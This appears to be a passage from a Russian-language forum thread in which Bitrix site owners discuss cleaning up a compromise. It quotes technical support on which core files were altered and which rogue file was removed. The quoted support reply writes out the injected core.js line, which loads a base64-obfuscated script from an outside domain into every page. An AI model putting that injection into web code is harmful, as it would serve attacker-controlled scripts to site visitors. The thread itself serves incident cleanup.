| Цитата |
|---|
| Chezorezka написал: Сервак перезапустить после данной процедуры? |
Значит проблема в другом файле.
Остается поиск.
Ещё модно просканировать бесплатным imunifyav.
Значит проблема в другом файле. Остается поиск. Ещё модно просканировать бесплатным imunifyav. |
|||
|
|
|
|
первые сообщения в консоли какие? на что ругается?
|
|
|
|
|
|
Техподдержка Битрикс:
У вас в файле /bitrix/modules/main/include/prolog.php были добавлены строки вызывающие скрипт: // \n<sc ript src=" (?) ript>;
В файл /bitrix/js/main/core/core.js была добавлена строка: \bs=document.createElement(script);s.src=atob(aHR0cHM6Ly9zdG9yZWpzY2RuLnB3L2pxdWVyeXVpLmpz);document.head.appendChild(s);
Сайт заработал корректно только после ручного удаления вредоносных строк. А также удалил вам вирусный файл /bitrix/components/bitrix/main.file.input/main.php То есть у всех, кто писал выше не хватает удаления main.php |
|
|
|
|
|
|||
|
|
|
|
это само собой,
а дайте ссылку на первых трех страницах о том, что нужно удалить main.php Я видимо пропустил |
|
|
|
|
|
|||
|
|
|
|
Интересно, что недавно мне встретилось 2 сайта, которые были хакнуты еще в конце июня, но вредоносный код начал работать только сейчас. Вероятно имеет смысл вообще все сайты на Битрикс проверять на наличие вредоносных файлов ))
мои проекты: | меня рекомендуют: | обо мне: | 1 час работы - 1400 руб.
|
|
|
|
|
|
|||
|
|
|
|
Агзамов Раиль, а у нас просто испортили файл prolog.php. Видимо код был рассчитан на то, что в конце php файла обязательно будет ?>
мои проекты: | меня рекомендуют: | обо мне: | 1 час работы - 1400 руб.
|
||||
|
|
|
|||